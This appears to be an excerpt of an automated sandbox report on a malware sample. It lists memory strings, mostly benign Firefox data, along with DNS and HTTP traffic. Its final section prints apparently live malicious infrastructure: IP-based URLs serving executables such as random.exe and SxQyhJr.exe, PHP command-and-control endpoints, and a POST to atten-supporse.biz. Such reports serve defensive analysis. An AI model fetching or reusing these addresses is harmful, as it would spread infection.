details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: --autocomplete-popup-separator-color--panel-banner-item-update-supported-bgcolor*://*.adsafeprotected.com/*/unit/**://www.facebook.com/platform/impression.php*executeIDB/promise</transaction.onerror equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8*://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Scheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttps://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://www.inbox.lv/rfc2368/?value=%sisDownloadsImprovementsAlreadyMigratedhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1 equals www.yahoo.com (Yahoo)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ipc:first-content-process-createdresource://gre/modules/amManager.sys.mjssitepermsaddon-provider-registeredspeculativeConnectWithOriginAttributes@mozilla.org/spellchecker/engine;1@mozilla.org/network/file-output-stream;1https://smartblock.firefox.etp/play.svg@mozilla.org/addons/addon-manager-startup;1resource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpiFileUtils_closeSafeFileOutputStream*://static.chartbeat.com/js/chartbeat.js*://static.criteo.net/js/ld/publishertag.js*://*.imgur.com/js/vendor.*.bundle.js*://libs.coremetrics.com/eluminate.js*://track.adform.net/serving/scripts/trackpoint/@mozilla.org/network/atomic-file-output-stream;1*://auth.9c9media.ca/auth/main.js*://*.imgur.io/js/vendor.*.bundle.jsresource://gre/modules/FileUtils.sys.mjs*://www.rva311.com/static/js/main.*.chunk.js*://c.amazon-adsystem.com/aax2/apstag.js*://connect.facebook.net/*/all.js**://www.everestjs.net/static/st.v3.js**://connect.facebook.net/*/sdk.js*pictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/safe-file-output-stream;1*://static.chartbeat.com/js/chartbeat_video.jshttps://smartblock.firefox.etp/facebook.svgresource://gre/modules/TelemetryStorage.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2925250004.000001DEF10F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: home.twentykx20pt.top
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001242000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2954316524.000000000113A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeI
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeze
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe7
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe:
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeC
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeo
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exeR
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpG
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206?
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exeD
